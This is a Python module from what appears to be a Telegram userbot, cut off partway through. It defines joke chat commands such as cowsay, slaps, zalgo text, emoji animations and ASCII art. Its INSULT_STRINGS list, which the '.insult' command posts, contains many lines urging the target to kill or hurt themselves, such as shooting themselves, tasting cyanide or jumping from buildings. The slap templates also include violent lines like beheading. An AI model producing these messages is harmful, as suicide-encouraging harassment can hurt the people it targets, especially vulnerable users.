"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/memes.py
|
zankforza/OpenUserBot-2
|
5774471b933c8a6c6f3df12ebf98bf7a7fd8ce3d
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/memes.py
|
zankforza/OpenUserBot-2
|
5774471b933c8a6c6f3df12ebf98bf7a7fd8ce3d
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | 5
|
2019-12-28T15:59:15.000Z
|
2020-01-24T18:34:52.000Z
|
# Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.c (the "License");
# you may not use this file except in compliance with the License.
""" Userbot module for having some fun with people. """
from asyncio import sleep
from random import choice, getrandbits, randint
from re import sub
import time
from collections import deque
import requests
from cowpy import cow
from userbot import CMD_HELP
from userbot.events import register
from userbot.modules.admin import get_user_from_event
# ================= CONSTANT =================
METOOSTR = [
"Me too thanks",
"Haha yes, me too",
"Same lol",
"Me irl",
"Same here",
"Haha yes",
"Me rn",
]
ZALG_LIST = [[
"̖",
" ̗",
" ̘",
" ̙",
" ̜",
" ̝",
" ̞",
" ̟",
" ̠",
" ̤",
" ̥",
" ̦",
" ̩",
" ̪",
" ̫",
" ̬",
" ̭",
" ̮",
" ̯",
" ̰",
" ̱",
" ̲",
" ̳",
" ̹",
" ̺",
" ̻",
" ̼",
" ͅ",
" ͇",
" ͈",
" ͉",
" ͍",
" ͎",
" ͓",
" ͔",
" ͕",
" ͖",
" ͙",
" ͚",
" ",
],
[
" ̍",
" ̎",
" ̄",
" ̅",
" ̿",
" ̑",
" ̆",
" ̐",
" ͒",
" ͗",
" ͑",
" ̇",
" ̈",
" ̊",
" ͂",
" ̓",
" ̈́",
" ͊",
" ͋",
" ͌",
" ̃",
" ̂",
" ̌",
" ͐",
" ́",
" ̋",
" ̏",
" ̽",
" ̉",
" ͣ",
" ͤ",
" ͥ",
" ͦ",
" ͧ",
" ͨ",
" ͩ",
" ͪ",
" ͫ",
" ͬ",
" ͭ",
" ͮ",
" ͯ",
" ̾",
" ͛",
" ͆",
" ̚",
],
[
" ̕",
" ̛",
" ̀",
" ́",
" ͘",
" ̡",
" ̢",
" ̧",
" ̨",
" ̴",
" ̵",
" ̶",
" ͜",
" ͝",
" ͞",
" ͟",
" ͠",
" ͢",
" ̸",
" ̷",
" ͡",
]]
EMOJIS = [
"😂",
"😂",
"👌",
"✌",
"💞",
"👍",
"👌",
"💯",
"🎶",
"👀",
"😂",
"👓",
"👏",
"👐",
"🍕",
"💥",
"🍴",
"💦",
"💦",
"🍑",
"🍆",
"😩",
"😏",
"👉👌",
"👀",
"👅",
"😩",
"🚰",
]
INSULT_STRINGS = [
"Owww ... Such a stupid idiot.",
"Don't drink and type.",
"I think you should go home or better a mental asylum.",
"Command not found. Just like your brain.",
"Do you realize you are making a fool of yourself? Apparently not.",
"You can type better than that.",
"Bot rule 544 section 9 prevents me from replying to stupid humans like you.",
"Sorry, we do not sell brains.",
"Believe me you are not normal.",
"I bet your brain feels as good as new, seeing that you never use it.",
"If I wanted to kill myself I'd climb your ego and jump to your IQ.",
"Zombies eat brains... you're safe.",
"You didn't evolve from apes, they evolved from you.",
"Come back and talk to me when your I.Q. exceeds your age.",
"I'm not saying you're stupid, I'm just saying you've got bad luck when it comes to thinking.",
"What language are you speaking? Cause it sounds like bullshit.",
"Stupidity is not a crime so you are free to go.",
"You are proof that evolution CAN go in reverse.",
"I would ask you how old you are but I know you can't count that high.",
"As an outsider, what do you think of the human race?",
"Brains aren't everything. In your case they're nothing.",
"Ordinarily people live and learn. You just live.",
"I don't know what makes you so stupid, but it really works.",
"Keep talking, someday you'll say something intelligent! (I doubt it though)",
"Shock me, say something intelligent.",
"Your IQ's lower than your shoe size.",
"Alas! Your neurotransmitters are no more working.",
"Are you crazy you fool.",
"Everyone has the right to be stupid but you are abusing the privilege.",
"I'm sorry I hurt your feelings when I called you stupid. I thought you already knew that.",
"You should try tasting cyanide.",
"Your enzymes are meant to digest rat poison.",
"You should try sleeping forever.",
"Pick up a gun and shoot yourself.",
"You could make a world record by jumping from a plane without parachute.",
"Stop talking BS and jump in front of a running bullet train.",
"Try bathing with Hydrochloric Acid instead of water.",
"Try this: if you hold your breath underwater for an hour, you can then hold it forever.",
"Go Green! Stop inhaling Oxygen.",
"God was searching for you. You should leave to meet him.",
"give your 100%. Now, go donate blood.",
"Try jumping from a hundred story building but you can do it only once.",
"You should donate your brain seeing that you never used it.",
"Volunteer for target in an firing range.",
"Head shots are fun. Get yourself one.",
"You should try swimming with great white sharks.",
"You should paint yourself red and run in a bull marathon.",
"You can stay underwater for the rest of your life without coming back up.",
"How about you stop breathing for like 1 day? That'll be great.",
"Try provoking a tiger while you both are in a cage.",
"Have you tried shooting yourself as high as 100m using a canon.",
"You should try holding TNT in your mouth and igniting it.",
"Try playing catch and throw with RDX its fun.",
"I heard phogine is poisonous but i guess you wont mind inhaling it for fun.",
"Launch yourself into outer space while forgetting oxygen on Earth.",
"You should try playing snake and ladders, with real snakes and no ladders.",
"Dance naked on a couple of HT wires.",
"Active Volcano is the best swimming pool for you.",
"You should try hot bath in a volcano.",
"Try to spend one day in a coffin and it will be yours forever.",
"Hit Uranium with a slow moving neutron in your presence. It will be a worthwhile experience.",
"You can be the first person to step on sun. Have a try.",
]
UWUS = [
"(・`ω´・)",
";;w;;",
"owo",
"UwU",
">w<",
"^w^",
r"\(^o\) (/o^)/",
"( ^ _ ^)∠☆",
"(ô_ô)",
"~:o",
";-;",
"(*^*)",
"(>_",
"(♥_♥)",
"*(^O^)*",
"((+_+))",
]
FACEREACTS = [
"ʘ‿ʘ",
"ヾ(-_- )ゞ",
"(っ˘ڡ˘ς)",
"(´ж`ς)",
"( ಠ ʖ̯ ಠ)",
"(° ͜ʖ͡°)╭∩╮",
"(ᵟຶ︵ ᵟຶ)",
"(งツ)ว",
"ʚ(•`",
"(っ▀¯▀)つ",
"(◠﹏◠)",
"( ͡ಠ ʖ̯ ͡ಠ)",
"( ఠ ͟ʖ ఠ)",
"(∩`-´)⊃━☆゚.*・。゚",
"(⊃。•́‿•̀。)⊃",
"(._.)",
"{•̃_•̃}",
"(ᵔᴥᵔ)",
"♨_♨",
"⥀.⥀",
"ح˚௰˚づ ",
"(҂◡_◡)",
"ƪ(ړײ)ƪ",
"(っ•́。•́)♪♬",
"◖ᵔᴥᵔ◗ ♪ ♫ ",
"(☞゚ヮ゚)☞",
"[¬º-°]¬",
"(Ծ‸ Ծ)",
"(•̀ᴗ•́)و ̑̑",
"ヾ(´〇`)ノ♪♪♪",
"(ง'̀-'́)ง",
"ლ(•́•́ლ)",
"ʕ •́؈•̀ ₎",
"♪♪ ヽ(ˇ∀ˇ )ゞ",
"щ(゚Д゚щ)",
"( ˇ෴ˇ )",
"눈_눈",
"(๑•́ ₃ •̀๑) ",
"( ˘ ³˘)♥ ",
"ԅ(≖‿≖ԅ)",
"♥‿♥",
"◔_◔",
"⁽⁽ଘ( ˊᵕˋ )ଓ⁾⁾",
"乁( ◔ ౪◔)「 ┑( ̄Д  ̄)┍",
"( ఠൠఠ )ノ",
"٩(๏_๏)۶",
"┌(ㆆ㉨ㆆ)ʃ",
"ఠ_ఠ",
"(づ。◕‿‿◕。)づ",
"(ノಠ ∩ಠ)ノ彡( \\o°o)\\",
"“ヽ(´▽`)ノ”",
"༼ ༎ຶ ෴ ༎ຶ༽",
"。゚( ゚இ‸இ゚)゚。",
"(づ ̄ ³ ̄)づ",
"(⊙.☉)7",
"ᕕ( ᐛ )ᕗ",
"t(-_-t)",
"(ಥ⌣ಥ)",
"ヽ༼ ಠ益ಠ ༽ノ",
"༼∵༽ ༼⍨༽ ༼⍢༽ ༼⍤༽",
"ミ●﹏☉ミ",
"(⊙_◎)",
"¿ⓧ_ⓧﮌ",
"ಠ_ಠ",
"(´・_・`)",
"ᕦ(ò_óˇ)ᕤ",
"⊙﹏⊙",
"(╯°□°)╯︵ ┻━┻",
r"¯\_(⊙︿⊙)_/¯",
"٩◔̯◔۶",
"°‿‿°",
"ᕙ(⇀‸↼‶)ᕗ",
"⊂(◉‿◉)つ",
"V•ᴥ•V",
"q(❂‿❂)p",
"ಥ_ಥ",
"ฅ^•ﻌ•^ฅ",
"ಥ﹏ಥ",
"( ^_^)o自自o(^_^ )",
"ಠ‿ಠ",
"ヽ(´▽`)/",
"ᵒᴥᵒ#",
"( ͡° ͜ʖ ͡°)",
"┬─┬ ノ( ゜-゜ノ)",
"ヽ(´ー`)ノ",
"☜(⌒▽⌒)☞",
"ε=ε=ε=┌(;*´Д`)ノ",
"(╬ ಠ益ಠ)",
"┬─┬⃰͡ (ᵔᵕᵔ͜ )",
"┻━┻ ︵ヽ(`Д´)ノ︵ ┻━┻",
r"¯\_(ツ)_/¯",
"ʕᵔᴥᵔʔ",
"(`・ω・´)",
"ʕ•ᴥ•ʔ",
"ლ(`ー´ლ)",
"ʕʘ̅͜ʘ̅ʔ",
"( ゚Д゚)",
r"¯\(°_o)/¯",
"(。◕‿◕。)",
]
RUNS_STR = [
"Runs to Thanos..",
"Runs far, far away from earth..",
"Running faster than Bolt coz i'mma userbot !!",
"Runs to Marie..",
"This Group is too cancerous to deal with.",
"Cya bois",
"Kys",
"I go away",
"I am just walking off, coz me is too fat.",
"I Fugged off!",
"Will run for chocolate.",
"I run because I really like food.",
"Running...\nbecause dieting is not an option.",
"Wicked fast runnah",
"If you wanna catch me, you got to be fast...\nIf you wanna stay with me, you got to be good...\nBut if you wanna pass me...\nYou've got to be kidding.",
"Anyone can run a hundred meters, it's the next forty-two thousand and two hundred that count.",
"Why are all these people following me?",
"Are the kids still chasing me?",
"Running a marathon...there's an app for that.",
]
CHASE_STR = [
"Where do you think you're going?",
"Huh? what? did they get away?",
"ZZzzZZzz... Huh? what? oh, just them again, nevermind.",
"Get back here!",
"Not so fast...",
"Look out for the wall!",
"Don't leave me alone with them!!",
"You run, you die.",
"Jokes on you, I'm everywhere",
"You're gonna regret that...",
"You could also try /kickme, I hear that's fun.",
"Go bother someone else, no-one here cares.",
"You can run, but you can't hide.",
"Is that all you've got?",
"I'm behind you...",
"You've got company!",
"We can do this the easy way, or the hard way.",
"You just don't get it, do you?",
"Yeah, you better run!",
"Please, remind me how much I care?",
"I'd run faster if I were you.",
"That's definitely the droid we're looking for.",
"May the odds be ever in your favour.",
"Famous last words.",
"And they disappeared forever, never to be seen again.",
"\"Oh, look at me! I'm so cool, I can run from a bot!\" - this person",
"Yeah yeah, just tap /kickme already.",
"Here, take this ring and head to Mordor while you're at it.",
"Legend has it, they're still running...",
"Unlike Harry Potter, your parents can't protect you from me.",
"Fear leads to anger. Anger leads to hate. Hate leads to suffering. If you keep running in fear, you might "
"be the next Vader.",
"Multiple calculations later, I have decided my interest in your shenanigans is exactly 0.",
"Legend has it, they're still running.",
"Keep it up, not sure we want you here anyway.",
"You're a wiza- Oh. Wait. You're not Harry, keep moving.",
"NO RUNNING IN THE HALLWAYS!",
"Hasta la vista, baby.",
"Who let the dogs out?",
"It's funny, because no one cares.",
"Ah, what a waste. I liked that one.",
"Frankly, my dear, I don't give a damn.",
"My milkshake brings all the boys to yard... So run faster!",
"You can't HANDLE the truth!",
"A long time ago, in a galaxy far far away... Someone would've cared about that. Not anymore though.",
"Hey, look at them! They're running from the inevitable banhammer... Cute.",
"Han shot first. So will I.",
"What are you running after, a white rabbit?",
"As The Doctor would say... RUN!",
]
HELLOSTR = [
"Hi !",
"‘Ello, gov'nor!",
"What’s crackin’?",
"‘Sup, homeslice?",
"Howdy, howdy ,howdy!",
"Hello, who's there, I'm talking.",
"You know who this is.",
"Yo!",
"Whaddup.",
"Greetings and salutations!",
"Hello, sunshine!",
"Hey, howdy, hi!",
"What’s kickin’, little chicken?",
"Peek-a-boo!",
"Howdy-doody!",
"Hey there, freshman!",
"I come in peace!",
"Ahoy, matey!",
"Hiya!",
]
SHGS = [
"┐(´д`)┌",
"┐(´~`)┌",
"┐(´ー`)┌",
"┐( ̄ヘ ̄)┌",
"╮(╯∀╰)╭",
"╮(╯_╰)╭",
"┐(´д`)┌",
"┐(´∀`)┌",
"ʅ(́◡◝)ʃ",
"┐(゚~゚)┌",
"┐('д')┌",
"┐(‘~`;)┌",
"ヘ(´-`;)ヘ",
"┐( -“-)┌",
"ʅ(´◔౪◔)ʃ",
"ヽ(゜~゜o)ノ",
"ヽ(~~~ )ノ",
"┐(~ー~;)┌",
"┐(-。ー;)┌",
r"¯\_(ツ)_/¯",
r"¯\_(⊙_ʖ⊙)_/¯",
r"¯\_༼ ಥ ‿ ಥ ༽_/¯",
"乁( ⁰͡ Ĺ̯ ⁰͡ ) ㄏ",
]
CRI = [
"أ‿أ",
"╥﹏╥",
"(;﹏;)",
"(ToT)",
"(┳Д┳)",
"(ಥ﹏ಥ)",
"(;へ:)",
"(T_T)",
"(πーπ)",
"(T▽T)",
"(⋟﹏⋞)",
"(iДi)",
"(´Д⊂ヽ",
"(;Д;)",
"(>﹏<)",
"(TдT)",
"(つ﹏⊂)",
"༼☯﹏☯༽",
"(ノ﹏ヽ)",
"(ノAヽ)",
"(╥_╥)",
"(T⌓T)",
"(༎ຶ⌑༎ຶ)",
"(☍﹏⁰)。",
"(ಥ_ʖಥ)",
"(つд⊂)",
"(≖͞_≖̥)",
"(இ﹏இ`。)",
"༼ಢ_ಢ༽",
"༼ ༎ຶ ෴ ༎ຶ༽",
]
SLAP_TEMPLATES = [
"{hits} {victim} with a {item}.",
"{hits} {victim} in the face with a {item}.",
"{hits} {victim} around a bit with a {item}.",
"{throws} a {item} at {victim}.",
"grabs a {item} and {throws} it at {victim}'s face.",
"{hits} a {item} at {victim}.", "{throws} a few {item} at {victim}.",
"grabs a {item} and {throws} it in {victim}'s face.",
"launches a {item} in {victim}'s general direction.",
"sits on {victim}'s face while slamming a {item} {where}.",
"starts slapping {victim} silly with a {item}.",
"pins {victim} down and repeatedly {hits} them with a {item}.",
"grabs up a {item} and {hits} {victim} with it.",
"starts slapping {victim} silly with a {item}.",
"holds {victim} down and repeatedly {hits} them with a {item}.",
"prods {victim} with a {item}.",
"picks up a {item} and {hits} {victim} with it.",
"ties {victim} to a chair and {throws} a {item} at them.",
"{hits} {victim} {where} with a {item}.",
"ties {victim} to a pole and whips them {where} with a {item}."
"gave a friendly push to help {victim} learn to swim in lava.",
"sent {victim} to /dev/null.", "sent {victim} down the memory hole.",
"beheaded {victim}.", "threw {victim} off a building.",
"replaced all of {victim}'s music with Nickelback.",
"spammed {victim}'s email.", "made {victim} a knuckle sandwich.",
"slapped {victim} with pure nothing.",
"hit {victim} with a small, interstellar spaceship.",
"quickscoped {victim}.", "put {victim} in check-mate.",
"RSA-encrypted {victim} and deleted the private key.",
"put {victim} in the friendzone.",
"slaps {victim} with a DMCA takedown request!"
]
ITEMS = [
"cast iron skillet",
"large trout",
"baseball bat",
"cricket bat",
"wooden cane",
"nail",
"printer",
"shovel",
"pair of trousers",
"CRT monitor",
"diamond sword",
"baguette",
"physics textbook",
"toaster",
"portrait of Richard Stallman",
"television",
"mau5head",
"five ton truck",
"roll of duct tape",
"book",
"laptop",
"old television",
"sack of rocks",
"rainbow trout",
"cobblestone block",
"lava bucket",
"rubber chicken",
"spiked bat",
"gold block",
"fire extinguisher",
"heavy rock",
"chunk of dirt",
"beehive",
"piece of rotten meat",
"bear",
"ton of bricks",
]
THROW = [
"throws",
"flings",
"chucks",
"hurls",
]
HIT = [
"hits",
"whacks",
"slaps",
"smacks",
"bashes",
]
WHERE = ["in the chest", "on the head", "on the butt", "on the crotch"]
# ===========================================
@register(outgoing=True, pattern=r"^.(\w+)say (.*)")
async def univsaye(cowmsg):
""" For .cowsay module, userbot wrapper for cow which says things. """
arg = cowmsg.pattern_match.group(1).lower()
text = cowmsg.pattern_match.group(2)
if arg == "cow":
arg = "default"
if arg not in cow.COWACTERS:
return
cheese = cow.get_cow(arg)
cheese = cheese()
await cowmsg.edit(f"`{cheese.milk(text).replace('`', '´')}`")
@register(outgoing=True, pattern="^:/$", ignore_unsafe=True)
async def kek(keks):
""" Check yourself ;)"""
uio = ["/", "\\"]
for i in range(1, 15):
time.sleep(0.3)
await keks.edit(":" + uio[i % 2])
@register(outgoing=True, pattern=r"^.coinflip (.*)")
async def coin(event):
r = choice(["heads", "tails"])
input_str = event.pattern_match.group(1)
if input_str:
input_str = input_str.lower()
if r == "heads":
if input_str == "heads":
await event.edit(
"The coin landed on: **Heads**.\nYou were correct.")
elif input_str == "tails":
await event.edit(
"The coin landed on: **Heads**.\nYou weren't correct, try again ..."
)
else:
await event.edit("The coin landed on: **Heads**.")
elif r == "tails":
if input_str == "tails":
await event.edit(
"The coin landed on: **Tails**.\nYou were correct.")
elif input_str == "heads":
await event.edit(
"The coin landed on: **Tails**.\nYou weren't correct, try again ..."
)
else:
await event.edit("The coin landed on: **Tails**.")
@register(pattern="^.slap(?: |$)(.*)", outgoing=True)
async def who(event):
""" slaps a user, or get slapped if not a reply. """
replied_user = await get_user_from_event(event)
if replied_user:
replied_user = replied_user[0]
else:
return
caption = await slap(replied_user, event)
try:
await event.edit(caption)
except BaseException:
await event.edit(
"`Can't slap this person, need to fetch some sticks and stones !!`"
)
async def slap(replied_user, event):
""" Construct a funny slap sentence !! """
user_id = replied_user.id
first_name = replied_user.first_name
username = replied_user.username
if username:
slapped = "@{}".format(username)
else:
slapped = f"[{first_name}](tg://user?id={user_id})"
temp = choice(SLAP_TEMPLATES)
item = choice(ITEMS)
hit = choice(HIT)
throw = choice(THROW)
where = choice(WHERE)
caption = "..." + temp.format(
victim=slapped, item=item, hits=hit, throws=throw, where=where)
return caption
@register(outgoing=True, pattern="^-_-$", ignore_unsafe=True)
async def lol(lel):
""" Ok... """
okay = "-_-"
for i in range(10):
okay = okay[:-1] + "_-"
await lel.edit(okay)
@register(outgoing=True, pattern="^.(yes|no|maybe|decide)$")
async def decide(event):
decision = event.pattern_match.group(1).lower()
message_id = event.reply_to_msg_id if event.reply_to_msg_id else None
if decision != "decide":
r = requests.get(f"https://yesno.wtf/api?force={decision}").json()
else:
r = requests.get(f"https://yesno.wtf/api").json()
await event.delete()
await event.client.send_message(event.chat_id,
str(r["answer"]).upper(),
reply_to=message_id,
file=r["image"])
@register(outgoing=True, pattern="^;_;$", ignore_unsafe=True)
async def fun(e):
t = ";_;"
for j in range(10):
t = t[:-1] + "_;"
await e.edit(t)
@register(outgoing=True, pattern="^.fp$")
async def facepalm(e):
""" Facepalm 🤦♂ """
await e.edit("🤦♂")
@register(outgoing=True, pattern="^.cry$")
async def cry(e):
""" y u du dis, i cry everytime !! """
await e.edit(choice(CRI))
@register(outgoing=True, pattern="^.insult$")
async def insult(e):
""" I make you cry !! """
await e.edit(choice(INSULT_STRINGS))
@register(outgoing=True, pattern="^.cp(?: |$)(.*)")
async def copypasta(cp_e):
""" Copypasta the famous meme """
textx = await cp_e.get_reply_message()
message = cp_e.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await cp_e.edit("`😂🅱️IvE👐sOME👅text👅for✌️Me👌tO👐MAkE👀iT💞funNy!💦`")
return
reply_text = choice(EMOJIS)
# choose a random character in the message to be substituted with 🅱️
b_char = choice(message).lower()
for owo in message:
if owo == " ":
reply_text += choice(EMOJIS)
elif owo in EMOJIS:
reply_text += owo
reply_text += choice(EMOJIS)
elif owo.lower() == b_char:
reply_text += "🅱️"
else:
if bool(getrandbits(1)):
reply_text += owo.upper()
else:
reply_text += owo.lower()
reply_text += choice(EMOJIS)
await cp_e.edit(reply_text)
@register(outgoing=True, pattern="^.vapor(?: |$)(.*)")
async def vapor(vpr):
""" Vaporize everything! """
reply_text = list()
textx = await vpr.get_reply_message()
message = vpr.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await vpr.edit("`Give some text for vapor!`")
return
for charac in message:
if 0x21 <= ord(charac) <= 0x7F:
reply_text.append(chr(ord(charac) + 0xFEE0))
elif ord(charac) == 0x20:
reply_text.append(chr(0x3000))
else:
reply_text.append(charac)
await vpr.edit("".join(reply_text))
@register(outgoing=True, pattern="^.str(?: |$)(.*)")
async def stretch(stret):
""" Stretch it."""
textx = await stret.get_reply_message()
message = stret.text
message = stret.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await stret.edit("`GiiiiiiiB sooooooomeeeeeee teeeeeeext!`")
return
count = randint(3, 10)
reply_text = sub(r"([aeiouAEIOUaeiouAEIOUаеиоуюяыэё])", (r"\1" * count),
message)
await stret.edit(reply_text)
@register(outgoing=True, pattern="^.zal(?: |$)(.*)")
async def zal(zgfy):
""" Invoke the feeling of chaos. """
reply_text = list()
textx = await zgfy.get_reply_message()
message = zgfy.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await zgfy.edit(
"`gͫ ̆ i̛ ̺ v͇̆ ȅͅ a̢ͦ s̴̪ c̸̢ ä̸ rͩͣ y͖͞ t̨͚ é̠ x̢͖ t͔͛`"
)
return
for charac in message:
if not charac.isalpha():
reply_text.append(charac)
continue
for _ in range(0, 3):
randint = randint(0, 2)
if randint == 0:
charac = charac.strip() + \
choice(ZALG_LIST[0]).strip()
elif randint == 1:
charac = charac.strip() + \
choice(ZALG_LIST[1]).strip()
else:
charac = charac.strip() + \
choice(ZALG_LIST[2]).strip()
reply_text.append(charac)
await zgfy.edit("".join(reply_text))
@register(outgoing=True, pattern="^.hi$")
async def hoi(hello):
""" Greet everyone! """
await hello.edit(choice(HELLOSTR))
@register(outgoing=True, pattern="^.owo(?: |$)(.*)")
async def faces(owo):
""" UwU """
textx = await owo.get_reply_message()
message = owo.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await owo.edit("` UwU no text given! `")
return
reply_text = sub(r"(r|l)", "w", message)
reply_text = sub(r"(R|L)", "W", reply_text)
reply_text = sub(r"n([aeiou])", r"ny\1", reply_text)
reply_text = sub(r"N([aeiouAEIOU])", r"Ny\1", reply_text)
reply_text = sub(r"\!+", " " + choice(UWUS), reply_text)
reply_text = reply_text.replace("ove", "uv")
reply_text += " " + choice(UWUS)
await owo.edit(reply_text)
@register(outgoing=True, pattern="^.react$")
async def react_meme(react):
""" Make your userbot react to everything. """
await react.edit(choice(FACEREACTS))
@register(outgoing=True, pattern="^.shg$")
async def shrugger(shg):
r""" ¯\_(ツ)_/¯ """
await shg.edit(choice(SHGS))
@register(outgoing=True, pattern="^.chase$")
async def police(chase):
""" Run boi run, i'm gonna catch you !! """
await chase.edit(choice(CHASE_STR))
@register(outgoing=True, pattern="^.run$")
async def runner_lol(run):
""" Run, run, RUNNN! """
await run.edit(choice(RUNS_STR))
@register(outgoing=True, pattern="^.metoo$")
async def metoo(hahayes):
""" Haha yes """
await hahayes.edit(choice(METOOSTR))
@register(outgoing=True, pattern="^Oof$")
async def Oof(e):
t = "Oof"
for j in range(15):
t = t[:-1] + "of"
await e.edit(t)
@register(outgoing=True, pattern="^.10iq$")
async def iqless(e):
await e.edit("♿")
@register(outgoing=True, pattern="^.moon$")
async def moon(event):
deq = deque(list("🌗🌘🌑🌒🌓🌔🌕🌖"))
try:
for x in range(32):
await sleep(0.1)
await event.edit("".join(deq))
deq.rotate(1)
except BaseException:
return
@register(outgoing=True, pattern="^.earth$")
async def earth(event):
deq = deque(list("🌏🌍🌎🌎🌍🌏🌍🌎"))
try:
for x in range(32):
await sleep(0.1)
await event.edit("".join(deq))
deq.rotate(1)
except BaseException:
return
@register(outgoing=True, pattern="^.clock$")
async def clock(event):
deq = deque(list("🕙🕘🕗🕖🕕🕔🕓🕒🕑🕐🕛"))
try:
for x in range(32):
await sleep(0.1)
await event.edit("".join(deq))
deq.rotate(1)
except BaseException:
return
@register(outgoing=True, pattern="^.rain$")
async def rain(event):
deq = deque(list("☀️🌤⛅️🌥☁️🌧⛈"))
try:
for x in range(32):
await sleep(0.1)
await event.edit("".join(deq))
deq.rotate(1)
except BaseException:
return
@register(outgoing=True, pattern="^.love$")
async def love(event):
deq = deque(list("❤️🧡💛💚💙💜🖤💕💞💓💗💖💘💝"))
try:
for x in range(32):
await sleep(0.1)
await event.edit("".join(deq))
deq.rotate(1)
except BaseException:
return
@register(outgoing=True, pattern="^.mock(?: |$)(.*)")
async def spongemocktext(mock):
""" Do it and find the real fun. """
reply_text = list()
textx = await mock.get_reply_message()
message = mock.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await mock.edit("`gIvE sOMEtHInG tO MoCk!`")
return
for charac in message:
if charac.isalpha() and randint(0, 1):
to_app = charac.upper() if charac.islower() else charac.lower()
reply_text.append(to_app)
else:
reply_text.append(charac)
await mock.edit("".join(reply_text))
@register(outgoing=True, pattern="^.clap(?: |$)(.*)")
async def claptext(memereview):
""" Praise people! """
textx = await memereview.get_reply_message()
message = memereview.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await memereview.edit("`Hah, I don't clap pointlessly!`")
return
reply_text = "👏 "
reply_text += message.replace(" ", " 👏 ")
reply_text += " 👏"
await memereview.edit(reply_text)
@register(outgoing=True, pattern="^.bt$")
async def bluetext(bt_e):
""" Believe me, you will find this useful. """
if await bt_e.get_reply_message() and bt_e.is_group:
await bt_e.edit(
"/BLUETEXT /MUST /CLICK.\n"
"/ARE /YOU /A /STUPID /ANIMAL /WHICH /IS /ATTRACTED /TO /COLOURS?")
@register(outgoing=True, pattern=r"^.f (.*)")
async def payf(event):
paytext = event.pattern_match.group(1)
pay = "{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}".format(
paytext * 8, paytext * 8, paytext * 2, paytext * 2, paytext * 2,
paytext * 6, paytext * 6, paytext * 2, paytext * 2, paytext * 2,
paytext * 2, paytext * 2)
await event.edit(pay)
@register(outgoing=True, pattern="^.lfy (.*)")
async def let_me_google_that_for_you(lmgtfy_q):
textx = await lmgtfy_q.get_reply_message()
qry = lmgtfy_q.pattern_match.group(1)
if qry:
query = str(qry)
elif textx:
query = textx
query = query.message
query_encoded = query.replace(" ", "+")
lfy_url = f"http://lmgtfy.com/?s=g&iie=1&q={query_encoded}"
payload = {'format': 'json', 'url': lfy_url}
r = requests.get('http://is.gd/create.php', params=payload)
await lmgtfy_q.edit(f"Here you are, help yourself.\
\n[{query}]({r.json()['shorturl']})")
@register(pattern=r".scam(?: |$)(.*)", outgoing=True)
async def scam(event):
""" Just a small command to fake chat actions for fun !! """
options = [
'typing', 'contact', 'game', 'location', 'voice', 'round', 'video',
'photo', 'document', 'cancel'
]
input_str = event.pattern_match.group(1)
args = input_str.split()
if len(args) == 0: # Let bot decide action and time
scam_action = choice(options)
scam_time = randint(30, 60)
elif len(args) == 1: # User decides time/action, bot decides the other.
try:
scam_action = str(args[0]).lower()
scam_time = randint(30, 60)
except ValueError:
scam_action = choice(options)
scam_time = int(args[0])
elif len(args) == 2: # User decides both action and time
scam_action = str(args[0]).lower()
scam_time = int(args[1])
else:
await event.edit("`Invalid Syntax !!`")
return
try:
if (scam_time > 0):
await event.delete()
async with event.client.action(event.chat_id, scam_action):
await sleep(scam_time)
except BaseException:
return
@register(pattern=r".type(?: |$)(.*)", outgoing=True)
async def typewriter(typew):
""" Just a small command to make your keyboard become a typewriter! """
textx = await typew.get_reply_message()
message = typew.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await typew.edit("`Give a text to type!`")
return
sleep_time = 0.03
typing_symbol = "|"
old_text = ""
await typew.edit(typing_symbol)
await sleep(sleep_time)
for character in message:
old_text = old_text + "" + character
typing_text = old_text + "" + typing_symbol
await typew.edit(typing_text)
await sleep(sleep_time)
await typew.edit(old_text)
await sleep(sleep_time)
@register(outgoing=True, pattern="^.leave$")
async def leave(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`You must Leaving dis Group kek!`")
@register(outgoing=True, pattern="^.fail$")
async def fail(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ `"
"`\n████▌▄▌▄▐▐▌█████ `"
"`\n████▌▄▌▄▐▐▌▀████ `"
"`\n▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ `")
@register(outgoing=True, pattern="^.lol$")
async def lol(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n╱┏┓╱╱╱╭━━━╮┏┓╱╱╱╱ `"
"`\n╱┃┃╱╱╱┃╭━╮┃┃┃╱╱╱╱ `"
"`\n╱┃┗━━┓┃╰━╯┃┃┗━━┓╱ `"
"`\n╱┗━━━┛╰━━━╯┗━━━┛╱ `")
@register(outgoing=True, pattern="^.lool$")
async def lool(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n╭╭━━━╮╮┈┈┈┈┈┈┈┈┈┈\n┈┃╭━━╯┈┈┈┈▕╲▂▂╱▏┈\n┈┃┃╱▔▔▔▔▔▔▔▏╱▋▋╮┈`"
"`\n┈┃╰▏┃╱╭╮┃╱╱▏╱╱▆┃┈\n┈╰━▏┗━╰╯┗━╱╱╱╰┻┫┈\n┈┈┈▏┏┳━━━━▏┏┳━━╯┈`"
"`\n┈┈┈▏┃┃┈┈┈┈▏┃┃┈┈┈┈ `")
@register(outgoing=True, pattern="^.stfu$")
async def stfu(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n██████████████████████████████`"
"`\n██▀▀▀▀████▀▀▀▀████▀▀▀▀▀███▀▀██▀▀█`"
"`\n█──────██──────██───────██──██──█`"
"`\n█──██▄▄████──████──███▄▄██──██──█`"
